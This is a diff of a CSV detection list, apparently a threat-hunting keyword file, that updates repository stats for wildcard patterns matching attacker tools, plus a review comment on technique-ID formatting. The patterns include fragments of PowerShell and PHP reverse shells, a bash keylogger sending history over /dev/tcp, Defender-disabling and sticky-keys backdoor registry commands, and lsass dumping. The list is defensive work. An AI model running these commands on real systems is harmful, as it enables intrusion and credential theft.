@@ -760,12 +800,12 @@ "*netsh interface portproxy add v4tov4*listenaddress=* listenport=*connectaddress=*connectport*","greyware_tool_keyword","netsh","The actor has used the following commands to enable port forwarding [T1090] on the host","T1090.003 - T1123","TA0005 - TA0002","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netsh interface portproxy delete v4tov4 listenport=*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*netsh interface portproxy show v4tov4*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" -"*netsh.exe add helper *\temp\*.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","0","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*netshrun.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*netsh.exe add helper *\temp\*.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*netshrun.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL 
allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*netstat -ano*","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*netstat -ant*","greyware_tool_keyword","netstat","View all active TCP connections and the TCP and UDP ports the host is listening on.","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*NETSTAT.EXE* -ano*","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*","greyware_tool_keyword","powershell","Powershell reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*","greyware_tool_keyword","powershell","Powershell reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool 
- risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ngrok tcp *","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*nhfjkakglbnnpkpldhjmpmmfefifedcj*","greyware_tool_keyword","Pron VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" 
@@ -775,7 +815,7 @@ "*nltest /all_trusts*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nltest /dclist*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nltest /domain_trusts*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" -"*nmap -*","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8299","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"*nmap -*","greyware_tool_keyword","nmap","A very common tool. 
Network host vuln and port detector.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" "*nmap * --script=*.nse*","greyware_tool_keyword","nmap","check exploit for CVEs with nmap","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation Tools","https://nmap.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*nmap -Pn -v -sS -F*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*nmap-*-setup.exe*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -812,20 +852,20 @@ "*PhoenixMiner.exe*","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PhoenixMiner_*_Windows\*","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*","greyware_tool_keyword","php","php reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*ping -n 10 localhost > nul*","greyware_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*pip* install updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*ping -n 10 localhost > nul*","greyware_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*pip* install updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" "*pktmon start*","greyware_tool_keyword","pktmon","pktmon network diagnostics tool for Windows that can be used for packet capture - packet drop detection - packet filtering and counting.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*plpmggfglncceinmilojdkiijhmajkjh*","greyware_tool_keyword","Red Panda VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*poeojclicodamonabcabmapamjkkmnnk*","greyware_tool_keyword","HMA VPN Proxy Unblocker","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*pooljnboifbodgifngpppfklhifechoe*","greyware_tool_keyword","GeoProxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*poor buffer accounting in str_netfd_alloc*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*port and pasv both active*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" -"*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*","greyware_tool_keyword","powershell","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*","greyware_tool_keyword","powershell","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*powershell New-ItemProperty -Path *HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell*Uninstall-WindowsFeature -Name Windows-Defender-GUI*","greyware_tool_keyword","powershell","Windows Defender tampering technique ","T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*Powershell.exe -windowstyle hidden -nop -ExecutionPolicy Bypass -Commmand *C:\Users\*\AppData\Roaming\*","greyware_tool_keyword","powershell","Adversaries may attempt to execute powershell script from known accessible location","T1059.001 - T1036 - T1216","TA0002 - TA0006","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*powershell.exe -exec bypass -noni -nop -w 1 -C*","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","High risk of false positive","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*powershell.exe -noni -nop -w 1 -enc *","greyware_tool_keyword","powershell","command 
pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","High risk of false positive","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*powershell.exe -exec bypass -noni -nop -w 1 -C*","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","High risk of false positive","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*powershell.exe -noni -nop -w 1 -enc *","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","High risk of false positive","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*ppajinakbfocjfnijggfndbdmjggcmde*","greyware_tool_keyword","My Browser Vpn","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*procdump*lsass*","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","N/A","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
"*processhacker-*-sdk.zip*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" 
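Review bot: The two re-added crackmapexec rows (`*powershell.exe -exec bypass -noni -nop -w 1 -C*` and `*powershell.exe -noni -nop -w 1 -enc *`) still carry `metadata_tool_techniques` as `"T1210 T1570 T1021 T1595 T1592 T1589 T1590 "`, space-separated with a trailing space, while the other rows in this hunk separate ids with ` - `. A consumer that splits that column on ` - ` would presumably read the whole string as one unknown technique id, so these two detections would fall out of any ATT&CK-based grouping or coverage report. Suggest writing the field as `"T1210 - T1570 - T1021 - T1595 - T1592 - T1589 - T1590"` on both rows. Their `metadata_tool_tactics` is `N/A` as well, so filling it in the same pass would keep the rows consistent with their neighbours.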
@@ -834,7 +874,7 @@ "*ProcessHacker.exe*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*ProcessHacker.sln*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*","greyware_tool_keyword","bash","Bash Keylogger","T1059 - T1003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*PSBits*NetShRun*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*PSBits*NetShRun*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further 
extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*psc4re/NSE-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*PsExec[1].exe*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*PsExec64*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -942,10 +982,10 @@ "*raw.githubusercontent.com*.xlm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.xlsm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*rclone copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40569","3714","2023-10-03T18:57:28Z","2014-03-16T16:19:57Z" -"*rclone.exe config create remote mega user *","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40569","3714","2023-10-03T18:57:28Z","2014-03-16T16:19:57Z" -"*rclone.exe* copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40569","3714","2023-10-03T18:57:28Z","2014-03-16T16:19:57Z" -"*rclone.exe* -l * *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","interactive mode","6","10","40569","3714","2023-10-03T18:57:28Z","2014-03-16T16:19:57Z" +"*rclone copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe config create remote mega user *","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe* copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe* -l * *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","interactive mode","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" "*reg add *HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server* /v fDenyTSConnections /t REG_DWORD /d 0 /f*","greyware_tool_keyword","reg","Allowing remote connections to this computer","T1021.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","7","7","N/A","N/A","N/A","N/A" "*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*","greyware_tool_keyword","reg","Hit F5 a bunch of times when you are at the RDP login screen","T1546.012 - T1059.003 - 
T1055.001","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*","greyware_tool_keyword","reg","At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.","T1546.012 - T1059.003 - T1055.001","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
@@ -964,7 +1004,7 @@ "*reg query hkcu\software\*\putty\session*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL*","greyware_tool_keyword","reg","Check if LSASS is running in PPL","T1012 - T1003.003","TA0009 - TA0006","N/A","N/A","Reconnaissance","https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*","greyware_tool_keyword","reg","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 